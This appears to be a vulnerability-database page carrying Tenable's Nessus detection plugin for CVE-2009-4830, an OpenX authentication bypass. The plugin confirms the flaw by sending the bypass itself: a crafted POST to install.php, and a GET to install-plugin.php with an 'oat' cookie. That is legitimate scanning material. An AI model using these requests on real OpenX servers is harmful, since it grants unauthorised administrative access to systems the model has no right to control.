| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| OpenX < 2.8.3 Authentication-Bypass | 28 Dec 200900:00 | – | nessus | |
| CVE-2009-4830 | 27 Apr 201015:00 | – | cve | |
| CVE-2009-4830 | 27 Apr 201015:00 | – | cvelist | |
| EUVD-2009-4793 | 7 Oct 202500:30 | – | euvd | |
| CVE-2009-4830 | 27 Apr 201015:30 | – | nvd | |
| OpenX Administrative Interface Authentication Bypass Vulnerability | 4 May 201000:00 | – | openvas | |
| Authentication flaw | 27 Apr 201015:30 | – | prion | |
| CVE-2009-4830 | 9 Jan 202611:49 | – | redhatcve |
| Source | Link |
|---|---|
| forum | www.forum.openx.org/index.php |
| cve | www.cve.mitre.org/cgi-bin/cvename.cgi |
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(43864);
script_version("1.10");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/06/01");
script_cve_id("CVE-2009-4830");
script_bugtraq_id(37457);
script_xref(name:"Secunia", value:"37914");
script_name(english:"OpenX install.php / install-plugin.php Admin Authentication Bypass");
script_set_attribute(attribute:"synopsis", value:
"A PHP application hosted on the remote web server has an
authentication bypass vulnerability.");
script_set_attribute(attribute:"description", value:
"The version of OpenX hosted on the remote web server has an
authentication bypass vulnerability. Sending a specially crafted
request to install.php or install-plugin.php bypasses the normal
authentication process.
A remote attacker could exploit this to gain administrative access to
the OpenX installation.");
script_set_attribute(attribute:"see_also", value:"http://forum.openx.org/index.php?showtopic=503454011");
script_set_attribute(attribute:"solution", value:
"Upgrade to OpenX 2.8.3 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2009/12/22");
script_set_attribute(attribute:"patch_publication_date", value:"2009/12/24");
script_set_attribute(attribute:"plugin_publication_date", value:"2010/01/12");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.");
script_dependencies("openx_detect.nasl");
script_require_keys("www/openx");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
OA_UPGRADE_UPGRADE = 35;
port = get_http_port(default:80);
if (!can_host_php(port:port))
exit(0, "The web server on port "+port+" doesn't support PHP scripts.");
install = get_install_from_kb(appname:'openx', port:port);
if (isnull(install))
exit(1, "No OpenX installs on port "+port+" were found in the KB.");
# First, look at install.php
url = install['dir'] + '/www/admin/install.php';
# make sure the page exists before posting
res = http_send_recv3(method:"GET", item:url, port:port);
if (isnull(res)) exit(1, "The web server on port "+port+" failed to respond.");
headers = parse_http_headers(status_line:res[0], headers:res[1]);
if (isnull(headers)) exit(1, 'Error parsing HTTP headers on port '+port+'.');
code = headers['$code'];
if (isnull(code)) exit(1, "Error parsing HTTP status code on port "+port+".");
# If the page exists, a GET will result in a redirect
if (code != 302)
debug_print("Error retrieving "+ build_url(qs:url, port:port));
else
{
# if the page exists, attempt to exploit
postdata = 'btn_openads='+SCRIPT_NAME+'&btn_plugins='+unixtime();
req = http_mk_post_req(
port:port,
item:url,
content_type:'application/x-www-form-urlencoded',
data:postdata
);
res = http_send_recv_req(port:port, req:req);
if (isnull(res))
exit(1, "The web server on port "+port+" failed to respond.");
# If the app is patched, the request will result in a redirect. Otherwise,
# we'll get the plugins page and an authenticated session
if ('<title>OpenX - Plugins</title>' >< res[2])
{
if (report_verbosity > 0)
{
report =
'\nNessus bypassed authentication by issuing the following request :\n\n'+
crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30)+'\n'+
req = http_mk_buffer_from_req(req:req)+'\n'+
crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30)+'\n';
security_hole(port:port, extra:report);
}
else security_hole(port);
exit(0);
}
}
# If that attempt didn't work, try to exploit install-plugin.php
plugin_name = SCRIPT_NAME+'-'+unixtime();
qs = '?status=1&plugin='+plugin_name;
url = install['dir']+'/www/admin/install-plugin.php'+qs;
enable_cookiejar();
set_http_cookie(name:'oat', value:OA_UPGRADE_UPGRADE);
req = http_mk_get_req(
port:port,
item:url
);
res = http_send_recv_req(port:port, req:req);
if (isnull(res))
exit(1, "The web server on port "+port+" failed to respond.");
# If the app is patched, the request will result in a redirect. Otherwise,
# it'll show us an error message and establish a session as admin
if ('Problems found with plugin '+plugin_name >< res[2])
{
if (report_verbosity > 0)
{
report =
'\nNessus bypassed authentication by issuing the following request :\n\n'+
crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30)+'\n'+
req = http_mk_buffer_from_req(req:req)+'\n'+
crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30)+'\n';
security_hole(port:port, extra:report);
}
else security_hole(port);
}
else
{
full_url = build_url(qs:install['dir'] + '/', port:port);
exit(0, 'The OpenX install at '+full_url+' is not affected.');
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation